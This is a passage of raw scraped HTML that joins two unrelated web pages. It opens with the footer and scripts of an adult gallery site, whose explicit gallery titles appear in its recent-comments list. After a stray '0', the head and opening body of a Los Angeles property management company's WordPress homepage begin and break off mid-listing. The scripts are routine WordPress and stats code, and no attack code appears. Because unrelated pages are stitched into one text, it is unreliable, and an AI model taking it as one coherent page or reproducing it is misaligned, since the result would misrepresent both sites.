value='http://mybigtitsbabes.com/2008/08/'> August 2008 </option> </select> </div> </div> <div class="footer-widget-3 grid one-fourth "> <div id="recent-comments-6" class="widget widget_recent_comments"><h3>Recent Comments</h3><ul id="recentcomments"><li class="recentcomments"><span class="comment-author-link">Carl Bennett</span> on <a href="http://mybigtitsbabes.com/big-tits-yulia-nova-1/#comment-378261">Big Tits Yulia Nova 1</a></li><li class="recentcomments"><span class="comment-author-link">Zak</span> on <a href="http://mybigtitsbabes.com/cara-ruby-leather-pants/#comment-378260">Cara Ruby Leather Pants</a></li><li class="recentcomments"><span class="comment-author-link">Don P</span> on <a href="http://mybigtitsbabes.com/big-tits-yulia-nova/#comment-378254">Big Tits Yulia Nova</a></li><li class="recentcomments"><span class="comment-author-link">James Beaumont</span> on <a href="http://mybigtitsbabes.com/big-tits-yulia-nova/#comment-378253">Big Tits Yulia Nova</a></li><li class="recentcomments"><span class="comment-author-link">Vincent</span> on <a href="http://mybigtitsbabes.com/neda-marie-umami-vegas/#comment-378251">Neda Marie Umami Vegas</a></li><li class="recentcomments"><span class="comment-author-link">Vishal</span> on <a href="http://mybigtitsbabes.com/elena-big-boobs-english-nurse-gallery/#comment-378250">Elena Big Boobs English Nurse Gallery</a></li><li class="recentcomments"><span class="comment-author-link">jume4</span> on <a href="http://mybigtitsbabes.com/ewa-sonnet-selfies/#comment-378248">Ewa Sonnet Selfies</a></li><li class="recentcomments"><span class="comment-author-link">jume4</span> on <a href="http://mybigtitsbabes.com/maible-twin-peaks/#comment-378247">Maible Twin Peaks</a></li></ul></div> </div> <div class="footer-widget-4 grid one-fourth last"> <div id="text-108" class="widget widget_text"><h3>Contact</h3> <div class="textwidget">Thanks for visiting! This is a clean fully responsive site - you can enjoy it on your PC, laptop, Mac, iPad / tablet or mobile. Anything you like or dislike about this site? Please help me improve it. Add a comment ( no spam please! ) or send an email to: thisdomainname [ at ] gmail.com Before you go don't forget to Bookmark and please come back again for new galleries tomorrow.</div> </div><div id="text-111" class="widget widget_text"><h3>LEGAL</h3> <div class="textwidget">Privacy Policy, Disclosure and 18 USC Section 2257 Information on <a href="http://mybigtitsbabes.com/legal/"><u>Legal Page</u></a></div> </div> </div> </div><!--/.pad--> </div><!--/.container-inner--> </div><!--/.container--> <nav class="nav-container group" id="nav-footer"> <div class="nav-toggle"><i class="fa fa-bars"></i></div> <div class="nav-text"><!-- put your mobile menu text here --></div> <div class="nav-wrap"><ul id="menu-footer-menu" class="nav container-inner group"><li id="menu-item-98490" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-98490"><a href="http://mybigtitsbabes.com">Home</a></li> <li id="menu-item-98492" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-98492"><a href="http://mybigtitsbabes.com/category/own-galleries/">Own Galleries</a></li> <li id="menu-item-98491" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-98491"><a href="http://mybigtitsbabes.com/webmasters-page/">Webmasters</a></li> </ul></div> </nav><!--/#nav-footer--> <div class="container" id="footer-bottom"> <div class="container-inner"> <a id="back-to-top" href="#"><i class="fa fa-angle-up"></i></a> <div class="pad group"> <div class="grid one-half"> <div id="copyright"> <p>mybigtitsbabes &copy; 2019. All Rights Reserved.</p> </div><!--/#copyright--> </div> <div class="grid one-half last"> <ul class="social-links"><li><a rel="nofollow" class="social-tooltip" title="Home" href="http://mybigtitsbabes.com/" ><i class="fa fa-home" ></i></a></li><li><a rel="nofollow" class="social-tooltip" title="Twitter" href="http://twitter.com/bigtitsblog" target="_blank"><i class="fa fa-twitter" ></i></a></li><li><a rel="nofollow" class="social-tooltip" title="Instagram" href="https://www.instagram.com/mbtb7259/" target="_blank"><i class="fa fa-instagram" ></i></a></li><li><a rel="nofollow" class="social-tooltip" title="Tumblr" href="http://mybigtitsbabesblog.tumblr.com/archive" target="_blank"><i class="fa fa-tumblr" ></i></a></li><li><a rel="nofollow" class="social-tooltip" title="RSS" href="http://mybigtitsbabes.com/feed/" target="_blank"><i class="fa fa-rss" ></i></a></li></ul> </div> </div><!--/.pad--> </div><!--/.container-inner--> </div><!--/.container--> </footer><!--/#footer--> </div><!--/#wrapper--> <script type='text/javascript'> /* <![CDATA[ */ var gdrts_rating_data = {"url":"http:\/\/mybigtitsbabes.com\/wp-admin\/admin-ajax.php","nonce":"1d8e4fc948","user":"0","handler":"gdrts_live_handler","wp_version":"47"}; /* ]]> */ </script> <script type='text/javascript' src='http://mybigtitsbabes.com/wp-content/plugins/gd-rating-system/js/rating.min.js?ver=1.2.290'></script> <script type='text/javascript' src='http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript' src='http://mybigtitsbabes.com/wp-content/themes/typecore-master/js/jquery.fitvids.js?ver=4.7.2'></script> <script type='text/javascript' src='http://mybigtitsbabes.com/wp-content/themes/typecore-master/js/scripts.js?ver=4.7.2'></script> <script type='text/javascript' src='http://mybigtitsbabes.com/wp-includes/js/wp-embed.min.js?ver=4.7.2'></script> <script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js?ver=3.0.21'></script> <!--[if lt IE 9]> <script src="http://mybigtitsbabes.com/wp-content/themes/typecore-master/js/ie/respond.js"></script> <![endif]--> <script type='text/javascript' src='http://stats.wp.com/e-201920.js' async defer></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:4.0.2',blog:'54070746',post:'0',tz:'0',srv:'mybigtitsbabes.com'} ]); _stq.push([ 'clickTrackerInit', '54070746', '0' ]); </script> </body> </html> <!-- *´¨) ¸.•´¸.•*´¨) ¸.•*¨) (¸.•´ (¸.•` ¤ Comet Cache Notes ¤ ´¨) --> <!-- Cache File Version Salt: n/a --> <!-- Cache File URL: http://mybigtitsbabes.com/ --> <!-- Cache File Path: /cache/comet-cache/cache/http/mybigtitsbabes-com/index.html --> <!-- Cache File Generated Via: HTTP request --> <!-- Cache File Generated On: May 16th, 2019 @ 3:16 pm UTC --> <!-- Cache File Generated In: 1.30093 seconds --> <!-- Cache File Expires On: May 17th, 2019 @ 3:16 pm UTC --> <!-- Cache File Auto-Rebuild On: May 17th, 2019 @ 3:16 pm UTC --> <!-- *´¨) ¸.•´¸.•*´¨) ¸.•*¨) (¸.•´ (¸.•` ¤ Comet Cache is Fully Functional ¤ ´¨) --> <!-- Loaded via Cache On: May 16th, 2019 @ 3:41 pm UTC --> <!-- Loaded via Cache In: 0.04045 seconds -->
0
<!doctype html> <!--[if lt IE 7]> <html class="lt-ie9 lt-ie8 lt-ie7" > <![endif]--> <!--[if IE 7]> <html class="lt-ie9 lt-ie8" > <![endif]--> <!--[if IE 8]> <html class="lt-ie9" > <![endif]--> <!--[if gt IE 8]><!--> <html > <!--<![endif]--> <head> <meta charset="UTF-8"> <link rel="shortcut icon" href="http://benleedsproperties.com/wp-content/uploads/2015/04/ben-leeds-favicon.png" /> <!-- Define a viewport to mobile devices to use - telling the browser to assume that the page is as wide as the device (width=device-width) and setting the initial page zoom level to be 1 (initial-scale=1.0) --> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="format-detection" content="telephone=no"> <link href='http://fonts.googleapis.com/css?family=Roboto+Condensed:300,400' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Roboto:400,500' rel='stylesheet' type='text/css'> <!-- Pingback URL --> <link rel="pingback" href="http://benleedsproperties.com/xmlrpc.php" /> <!-- RSS --> <link rel="alternate" type="application/rss+xml" title="Ben Leeds Properties" href="http://benleedsproperties.com/feed/" /> <link rel="alternate" type="application/atom+xml" title="Ben Leeds Properties" href="http://benleedsproperties.com/feed/atom/" /> <!-- HTML5 shim, for IE6-8 support of HTML5 elements --> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <title>Ben Leeds Properties</title> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Ben Leeds Properties &raquo; Feed" href="http://benleedsproperties.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Ben Leeds Properties &raquo; Comments Feed" href="http://benleedsproperties.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="Ben Leeds Properties &raquo; Home Comments Feed" href="http://benleedsproperties.com/home/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/benleedsproperties.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='http://benleedsproperties.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='inspiry-google-fonts-css' href='//fonts.googleapis.com/css?family=%7C%7C&#038;subset=latin%2Clatin-ext&#038;ver=2.6.2' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='http://benleedsproperties.com/wp-content/themes/realhomes/css/font-awesome.min.css?ver=4.6.3' type='text/css' media='all' /> <link rel='stylesheet' id='flexslider-css' href='http://benleedsproperties.com/wp-content/themes/realhomes/js/flexslider/flexslider.css?ver=2.6.0' type='text/css' media='all' /> <link rel='stylesheet' id='pretty-photo-css-css' href='http://benleedsproperties.com/wp-content/themes/realhomes/js/prettyphoto/css/prettyPhoto.css?ver=3.1.6' type='text/css' media='all' /> <link rel='stylesheet' id='swipebox-css' href='http://benleedsproperties.com/wp-content/themes/realhomes/js/swipebox/css/swipebox.min.css?ver=1.4.4' type='text/css' media='all' /> <link rel='stylesheet' id='select2-css' href='http://benleedsproperties.com/wp-content/themes/realhomes/js/select2/select2.css?ver=4.0.2' type='text/css' media='all' /> <link rel='stylesheet' id='main-css-css' href='http://benleedsproperties.com/wp-content/themes/realhomes/css/main.min.css?ver=2.6.2' type='text/css' media='all' /> <link rel='stylesheet' id='parent-default-css' href='http://benleedsproperties.com/wp-content/themes/realhomes/style.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='parent-custom-css' href='http://benleedsproperties.com/wp-content/themes/realhomes/css/custom.css?ver=2.6.2' type='text/css' media='all' /> <link rel='stylesheet' id='child-default-css' href='http://benleedsproperties.com/wp-content/themes/realhomes-child/style.css?ver=1.0' type='text/css' media='all' /> <link rel='stylesheet' id='child-custom-css' href='http://benleedsproperties.com/wp-content/themes/realhomes-child/child-custom.css?ver=1.0' type='text/css' media='all' /> <script type='text/javascript' src='http://benleedsproperties.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://benleedsproperties.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://benleedsproperties.com/wp-content/themes/realhomes/js/realhomes-common-scripts.js?ver=2.6.2'></script> <link rel='https://api.w.org/' href='http://benleedsproperties.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://benleedsproperties.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://benleedsproperties.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link rel="canonical" href="http://benleedsproperties.com/" /> <link rel='shortlink' href='http://benleedsproperties.com/' /> <link rel="alternate" type="application/json+oembed" href="http://benleedsproperties.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fbenleedsproperties.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://benleedsproperties.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fbenleedsproperties.com%2F&#038;format=xml" /> <style type='text/css' id='dynamic-css'> .header-wrapper, #currency-switcher #selected-currency, #currency-switcher-list li{ background-color:#ffffff; } #logo h2 a{ color:#ffffff; } #logo h2 a:hover, #logo h2 a:focus, #logo h2 a:active{ color:#666666; } .tag-line span{ color:#8b9293; } .tag-line span{ background-color:#343a3b; } .page-head h1.page-title span{ color:#000000; } .page-head h1.page-title span{ background-color:#ffffff; } .page-head p{ color:#ffffff; } .page-head p{ background-color:#37B3D9; } .header-wrapper, #contact-email, #contact-email a, .user-nav a, .social_networks li a, #currency-switcher #selected-currency, #currency-switcher-list li{ color:#929a9b; } #contact-email a:hover, .user-nav a:hover{ color:#b0b8b9; } #header-top, .social_networks li a, .user-nav a, .header-wrapper .social_networks, #currency-switcher #selected-currency, #currency-switcher-list li{ border-color:#ffffff; } .main-menu ul li a{ color:#000000; } .main-menu ul li.current-menu-ancestor > a, .main-menu ul li.current-menu-parent > a, .main-menu ul li.current-menu-item > a, .main-menu ul li.current_page_item > a, .main-menu ul li:hover > a, .main-menu ul li ul, .main-menu ul li ul li ul{ background-color:#666666; } .main-menu ul li.current-menu-ancestor > a, .main-menu ul li.current-menu-parent > a, .main-menu ul li.current-menu-item > a, .main-menu ul li.current_page_item > a, .main-menu ul li:hover > a, .main-menu ul li ul, .main-menu ul li ul li a, .main-menu ul li ul li ul, .main-menu ul li ul li ul li a{ color:#ffffff; } .main-menu ul li ul li:hover > a, .main-menu ul li ul li ul li:hover > a{ background-color:#999999; } .slide-description h3, .slide-description h3 a{ color:#394041; } .slide-description h3 a:hover, .slide-description h3 a:focus, .slide-description h3 a:active{ color:#dcc225; } .slide-description p{ color:#8b9293; } .slide-description span{ color:#dcc225; } .slide-description .know-more{ color:#ffffff; } .slide-description .know-more{ background-color:#37b3d9; } .slide-description .know-more:hover{ background-color:#2aa6cc; } .SFOI__content{ margin-top:50px; } .property-item{ background-color:#ffffff; } .property-item, .property-item .property-meta, .property-item .property-meta span{ border-color:#dedede; } .property-item h4, .property-item h4 a, .es-carousel-wrapper ul li h4 a{ color:#394041; } .property-item h4 a:hover, .property-item h4 a:focus, .property-item h4 a:active, .es-carousel-wrapper ul li h4 a:hover, .es-carousel-wrapper ul li h4 a:focus, .es-carousel-wrapper ul li h4 a:active{ color:#dcc225; } .property-item .price, .es-carousel-wrapper ul li .price, .property-item .price small{ color:#ffffff; } .property-item .price, .es-carousel-wrapper ul li .price{ background-color:#000000; } .property-item figure figcaption{ color:#ffffff; } .property-item figure figcaption{ background-color:#ec894d; } .property-item p, .es-carousel-wrapper ul li p{ color:#8b9293; } .more-details, .es-carousel-wrapper ul li p a{ color:#394041; } .more-details:hover, .more-details:focus, .more-details:active, .es-carousel-wrapper ul li p a:hover, .es-carousel-wrapper ul li p a:focus, .es-carousel-wrapper ul li p a:active{ color:#dcc225; } .property-item .property-meta span{ color:#394041; } .property-item .property-meta{ background-color:#f5f5f5; } #footer .widget .title{ color:#394041; } #footer .widget .textwidget, #footer .widget, #footer-bottom p{ color:#8b9293; } #footer .widget ul li a, #footer .widget a, #footer-bottom a{ color:#75797A; } #footer .widget ul li a:hover, #footer .widget ul li a:focus, #footer.widget ul li a:active, #footer .widget a:hover, #footer .widget a:focus, #footer .widget a:active, #footer-bottom a:hover, #footer-bottom a:focus, #footer-bottom a:active{ color:#dc7d44; } #footer-bottom{ border-color:#dedede; } .real-btn{ color:#ffffff; } .real-btn{ background-color:#000000; } .real-btn:hover, .real-btn.current{ color:#ffffff; } .real-btn:hover, .real-btn.current{ background-color:#666666; } @media (min-width: 980px) { .contact-number, .contact-number .outer-strip{ background-color:#ffffff; } .contact-number{ color:#010101; } .contact-number .fa-phone{ background-color:#ffffff; } } </style> <script type="text/javascript"> var RecaptchaOptions = { theme : 'custom', custom_theme_widget : 'recaptcha_widget' }; </script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> </head> <body class="home page-template page-template-template-home page-template-template-home-php page page-id-44"> <!-- Start Header --> <div class="header-wrapper"> <div class="container"><!-- Start Header Container --> <header id="header" class="clearfix"> <div id="header-top" class="clearfix"> <span id="contact-phone"> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" x="0px" y="0px" width="16px" height="16px" viewBox="0 0 24 24" enable-background="new 0 0 24 24" xml:space="preserve"> <path class="path" d="M5.597 1.999C6.4 2 8 2 8.1 5.51C8.017 6.1 7.8 6.3 7.5 6.658C7.12 7.1 6.4 7.9 6.4 9.2 c0 1.5 1 3.1 3.1 5.198c1.143 1.2 3.3 3.1 4.8 3.123c1.222 0 1.856-0.836 2.128-1.192 c0.18-0.236 0.284-0.373 0.862-0.468h0.055c3.91 0 4.6 0.8 4.6 2.476c0 0.358-0.151 1.891-0.893 2.8 c-0.297 0.382-1.161 0.789-2.695 0.789c-3.012 0-7.658-1.598-11.249-5.162C2.085 11.7 2 4.7 2 4.6 C2.021 2.2 4.8 2 5.6 2 M5.598-0.001c-0.385 0-5.578 0.084-5.578 4.624c0 0-0.041 7.8 5.8 13.6 c3.825 3.8 8.9 5.7 12.7 5.747c1.914 0 3.46-0.515 4.273-1.56c1.314-1.688 1.314-4.07 1.314-4.07 c0-4.618-4.734-4.47-6.801-4.476c-2.345 0.324-2.198 1.66-2.843 1.66c-0.187 0-1.32-0.393-3.409-2.523 c-2.106-2.085-2.527-3.234-2.527-3.797c0-1.265 1.396-1.328 1.662-3.602c-0.004-1.028-0.011-5.563-4.482-5.632 C5.621-0.001 5.613-0.001 5.598-0.001L5.598-0.001z"/> </svg> <span class="desktop-version">Office (310)815-9015</span><a class="mobile-version" href="tel://Office (310)815-9015" title="Make a Call">Office (310)815-9015</a> </span> <h2 id="contact-email"> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" x="0px" y="0px" width="16px" height="16px" viewBox="0 0 24 24" enable-background="new 0 0 24 24" xml:space="preserve"> <path class="path" d="M8.174 15.926l-6.799 5.438c-0.431 0.346-0.501 0.975-0.156 1.406s0.974 0.5 1.4 0.156l7.211-5.769L8.174 15.926z"/> <path class="path" d="M15.838 15.936l-1.685 1.214l7.222 5.777c0.433 0.3 1.1 0.3 1.406-0.156c0.345-0.432 0.274-1.061-0.157-1.406 L15.838 15.936z"/> <polygon class="path" points="1,10.2 1.6,10.9 12,2.6 22,10.6 22,22 2,22 2,10.2 1,10.2 1.6,10.9 1,10.2 0,10.2 0,24 24,24 24,9.7 12,0 0,9.7 0,10.2 1,10.2 1,10.2"/> <polygon class="path" points="23.6,11.7 12.6,19.7 11.4,19.7 0.4,11.7 0.4,11.7 0.4,11.7 1.6,10.1 12,17.6 22.4,10.1"/> </svg> <a href="mailto:man&#97;&#103;&#101;&#109;e&#110;&#116;&#64;b&#101;&#110;lee&#100;&#115;p&#114;o&#112;ert&#105;&#101;s&#46;com">m&#97;&#110;&#97;g&#101;&#109;e&#110;t&#64;be&#110;l&#101;&#101;&#100;&#115;&#112;r&#111;p&#101;&#114;t&#105;&#101;s&#46;&#99;&#111;&#109;</a> </h2> <!-- Social Navigation --> <!-- Services Buttons --> <div id="service_buttons"> <a href="/contact/"><i class="fa fa-dollar"></i><span>Make a Payment</span></a> <a href="/pdfs/64-rental-application-2014.pdf" target="_blank"><i class="fa fa-file-text-o"></i><span>Fill Out an Application</span></a> </div> </div> <!-- Logo --> <div id="logo"> <a title="Ben Leeds Properties" href="http://benleedsproperties.com"> <img src="http://benleedsproperties.com/wp-content/uploads/2015/04/ben-leeds-logo.png" alt="Ben Leeds Properties"> </a> <h2 class="logo-heading only-for-print"> <a href="http://benleedsproperties.com" title="Ben Leeds Properties"> Ben Leeds Properties </a> </h2> </div> <div class="menu-and-contact-wrap"> <!-- Start Main Menu--> <nav class="main-menu"> <div class="menu-main-menu-container"><ul id="menu-main-menu" class="clearfix"><li id="menu-item-834" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-44 current_page_item menu-item-834"><a href="http://benleedsproperties.com/" aria-current="page">Home</a></li> <li id="menu-item-1806" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1806"><a href="http://benleedsproperties.com/about/">About</a></li> <li id="menu-item-5716" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5716"><a href="http://benleedsproperties.com/property-search/">Property</a></li> <li id="menu-item-5501" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-5501"><a href="http://benleedsproperties.com/vacancy/">Vacancy</a> <ul class="sub-menu"> <li id="menu-item-5870" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5870"><a href="http://benleedsproperties.com/central-la/">Central LA</a></li> <li id="menu-item-5854" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5854"><a href="http://benleedsproperties.com/beverly-hills-adj/">Beverly Hills Adj.</a></li> <li id="menu-item-5868" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5868"><a href="http://benleedsproperties.com/san-fernando-valley/">San Fernando Valley</a></li> <li id="menu-item-5869" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5869"><a href="http://benleedsproperties.com/pasadena/">Pasadena</a></li> <li id="menu-item-5867" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5867"><a href="http://benleedsproperties.com/west-la/">West LA</a></li> <li id="menu-item-5882" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5882"><a href="http://benleedsproperties.com/all-regions/">All Regions</a></li> </ul> </li> <li id="menu-item-836" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-836"><a href="http://benleedsproperties.com/contact/">Contact</a> <ul class="sub-menu"> <li id="menu-item-1803" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1803"><a href="http://benleedsproperties.com/contact/">Contact Us</a></li> </ul> </li> <li id="menu-item-5728" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-5728"><a href="#">Tenant Resources</a> <ul class="sub-menu"> <li id="menu-item-5326" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5326"><a target="_blank" href="https://benleedsproperties.appfolio.com/connect">Tenant Portal</a></li> <li id="menu-item-5779" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5779"><a href="http://benleedsproperties.com/faq/">Frequently Asked Questions</a></li> <li id="menu-item-5838" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5838"><a href="http://benleedsproperties.com/helpful-links/">Helpful Links</a></li> <li id="menu-item-1801" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1801"><a href="http://benleedsproperties.com/tips/">Maintenance and Rental Tips</a></li> <li id="menu-item-5730" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5730"><a target="_blank" href="http://benleedsproperties.com/wp-content/uploads/2016/11/MoveOutInitialInspectionNotice-103116VT.pdf">Move-Out Notice</a></li> </ul> </li> </ul></div> </nav> <!-- End Main Menu --> </div> </header> </div> <!-- End Header Container --> </div><!-- End Header --> <!-- Slider --> <div id="home-flexslider" class="clearfix"> <div class="flexslider loading"> <!--<div id="flexslider-overlay"></div>--> <ul class="slides"> <li> <div class="desc-wrap"> </div> <img src="http://benleedsproperties.com/wp-content/uploads/2016/08/11.jpg" alt=""> </li> <li> <div class="desc-wrap"> </div> <img src="http://benleedsproperties.com/wp-content/uploads/2016/08/4.jpg" alt=""> </li> <li> <div class="desc-wrap"> </div> <img src="http://benleedsproperties.com/wp-content/uploads/2016/08/1.jpg" alt=""> </li> </ul> </div> </div> <!-- End Slider --> <div class="email_social_banner"> <div class="container"> <h2 id="contact-email"> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" x="0px" y="0px" width="16px" height="16px" viewBox="0 0 24 24" enable-background="new 0 0 24 24" xml:space="preserve"> <path class="path" d="M8.174 15.926l-6.799 5.438c-0.431 0.346-0.501 0.975-0.156 1.406s0.974 0.5 1.4 0.156l7.211-5.769L8.174 15.926z"/> <path class="path" d="M15.838 15.936l-1.685 1.214l7.222 5.777c0.433 0.3 1.1 0.3 1.406-0.156c0.345-0.432 0.274-1.061-0.157-1.406 L15.838 15.936z"/> <polygon class="path" points="1,10.2 1.6,10.9 12,2.6 22,10.6 22,22 2,22 2,10.2 1,10.2 1.6,10.9 1,10.2 0,10.2 0,24 24,24 24,9.7 12,0 0,9.7 0,10.2 1,10.2 1,10.2"/> <polygon class="path" points="23.6,11.7 12.6,19.7 11.4,19.7 0.4,11.7 0.4,11.7 0.4,11.7 1.6,10.1 12,17.6 22.4,10.1"/> </svg> <a href="mailto:m&#97;&#110;&#97;g&#101;me&#110;&#116;&#64;benl&#101;eds&#112;r&#111;&#112;ert&#105;e&#115;.&#99;&#111;&#109;">m&#97;nag&#101;men&#116;&#64;&#98;&#101;n&#108;&#101;e&#100;s&#112;rope&#114;tie&#115;.com</a> </h2> <!-- Social Navigation --> </div> </div> <div class="search_container"> <!-- Content --> <div class="container contents"> <div class="row"> <div class="span12"> <!-- Main Content --> <div class="main "> <section class="advance-search "> <h3 class="search-heading"><i class="fa fa-search"></i>Find Your Home</h3> </section> </div><!-- End Main Content --> </div> <!-- End span12 --> </div><!-- End row --> </div><!-- End content --> </div><!-- End Search Container --> <div class="content_container"> <!-- Content --> <div class="container contents"> <div class="row"> <div class="span12"> <div class="main "> <section id="home-properties-section" class="property-items ajax-pagination"> <div class="narrative"> <div class="slogan_title"> <h2>Welcome to Ben Leeds Properties</h2> </div> <div class="slogan_text"> <p>Ben Leeds Properties is Property Management company established since 1984. We manage over 4,000 apartments throughout the Greater Los Angeles Area. Headquartered at <b>3385 Overland Ave.</b> in Los Angeles, our focus is to offer the best living experience as well as exceptional resources to help you quickly locate the apartment home you’re looking for. We offer thoughtfully designed floor plans and a friendly professional management team dedicated to providing the best experience. Your satisfaction is our number one priority!</p> </div> </div> <div id="home-properties-section-wrapper"> <div id="home-properties-section-inner"> <div id="home-properties-wrapper"> <div id="home-properties" class="property-items-container clearfix"> <div class="span6 "> <article class="property-item clearfix"> <h4 class="right">West Los Angeles</h4> <h4><a href="http://benleedsproperties.com/property/1928-chariton-st-los-angeles-ca/">1928 Chariton St., Los Angeles, CA 90034</a></h4> <figure> <a href="http://benleedsproperties.com/property/1928-chariton-st-los-angeles-ca/"> <img width="244" height="163" src="http://benleedsproperties.com/wp-content/uploads/2015/05/1928chariton1-244x163.jpg" class="attachment-property-thumb-image size-property-thumb-image wp-post-image" alt="" /> </a> <figcaption class="for-rent">For Rent</figcaption> </figure> <div class="detail"> <h5 class="price"> <div class="right"> </div> </h5> <p>1928 Chariton St. Los Angeles, CA 90034</p> <a class="more-details" href="http://benleedsproperties.com/property/1928-chariton-st-los-angeles-ca/">More Details <i class="fa fa-caret-right"></i></a> </div> </article> </div><div class="span6 "> <article class="property-item clearfix"> <h4 class="right">West Los Angeles</h4> <h4><a href="http://benleedsproperties.com/property/11736-culver-blvd-los-angeles-ca/">11730 &#8211; 11846 Culver Blvd., Los Angeles, CA 90066</a></h4> <figure> <a href="http://benleedsproperties.com/property/11736-culver-blvd-los-angeles-ca/"> <img width="244" height="163" src="http://benleedsproperties.com/wp-content/uploads/2015/05/45-244x163.jpg" class="attachment-property-thumb-image size-property-thumb-image wp-post-image" alt="" srcset="http://benleedsproperties.com/wp-content/uploads/2015/05/45-244x163.jpg 244w, http://benleedsproperties.com/wp-content/uploads/2015/05/45-300x200.jpg 300w, http://benleedsproperties.com/wp-content/uploads/2015/05/45-1024x683.jpg 1024w, http://benleedsproperties.com/wp-content/uploads/2015/05/45-150x100.jpg 150w" sizes="(max-width: 244px) 100vw, 244px" /> </a> <figcaption class="for-rent">For Rent</figcaption> </figure> <div class="detail"> <h5 class="price"> <div class="right"> </div> </h5> <p>11730 